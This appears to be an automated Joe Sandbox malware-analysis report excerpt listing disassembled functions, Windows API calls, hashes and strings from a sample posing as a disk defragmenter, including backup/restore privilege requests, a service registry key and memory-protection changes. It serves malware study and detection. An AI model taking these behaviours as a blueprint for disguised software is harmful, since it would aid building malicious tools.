                                                                                                                                                                                                                                                                                    • Instruction ID: 3f53a812ee88c614be39cb66f25ae1a6b01f6845a1ee28e41b72ee3cff38c9b7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62215E72A0820AAFDB10AF619C45A7E7FA9FF493647108525F915971D1D730FC5097A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402044$CPUIdleTime
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2665702501
                                                                                                                                                                                                                                                                                    • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402045$CPUUsageExceed
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-436957165
                                                                                                                                                                                                                                                                                    • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,113262B6,?,?,?,00478D19,000000FF,0045997D,?), ref: 0045CF8C
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,20000000,00000000), ref: 0045CFE9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                    • String ID: \\?\
                                                                                                                                                                                                                                                                                    • API String ID: 415043291-4282027825
                                                                                                                                                                                                                                                                                    • Opcode ID: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction ID: 901598558c3e4d11bc3258ba10a6420141faa6f62916cefdcf4a46bf13df9223
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB1173766083009FE310CB54EC89F5BB7A9FB84721F10492EF959973D0D7789848C795
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?,?,75BFAF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateDriveDrivesInitializeInstanceLogicalTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 16435998-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction ID: b0155039b9989220c3f10694d0f533bb6dad7ff0edda0b00871a7334ab537921
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2901D4B6A183119B8314DF28DCC56AB73A5EB89314B01453FE45AC7251EB78AC84CBCA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegOpenKeyW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: SHCreateDirectory.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$CloseCreateDirectoryExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                    • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 2992731242-3464295076
                                                                                                                                                                                                                                                                                    • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                    • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                    • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                    • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                    • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0060926D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                    • Opcode ID: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                    • Instruction ID: 902ea12ca2a8b9ed67c7dd2cdb2c025495265744e63fc664879fcf873e36f5e2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518D71A4424ADFCF45CF98C991AEEBBF2EF09314F284095E465F7282C234AA51DF64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00609314
                                                                                                                                                                                                                                                                                      • Part of subcall function 00609098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00609366
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 006093C0
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 006093F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$FreeProtect
                                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                                    • API String ID: 980677596-3772416878
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,006012D6,00000001,00000364,00000000,?,000000FF,?,006044E3,?,?,00000000), ref: 00601789
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,00600C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00603D75
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,?), ref: 005FBFCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 005FBCC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: -BootTimeDefrag$-InstallNative$-UninstallNative$8<$8F$DiskDefrag$Foucs_Color$Frame_Color$Mid_Back_Color$SeBackupPrivilege$SeRestorePrivilege$Select_Color$Text_Color$Window
                                                                                                                                                                                                                                                                                    • API String ID: 0-3120907903
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000000,00000001), ref: 0041FAF6
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000001,00000001,?), ref: 0041FB49
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000002,00000001,?), ref: 0041FB9C
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 0041FBC3
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000001), ref: 0041FD14
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 0041FD7A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000002), ref: 0041FE06
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem
                                                                                                                                                                                                                                                                                    • String ID: $0$3401008$3401009$3401010$3401011$3401012$3401013$3401014$3401015$3401016$3401017$3401018$3401019$3401020$3401021$3401022$3401024$3401098$3401131$^H
                                                                                                                                                                                                                                                                                    • API String ID: 1040333723-558355984
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
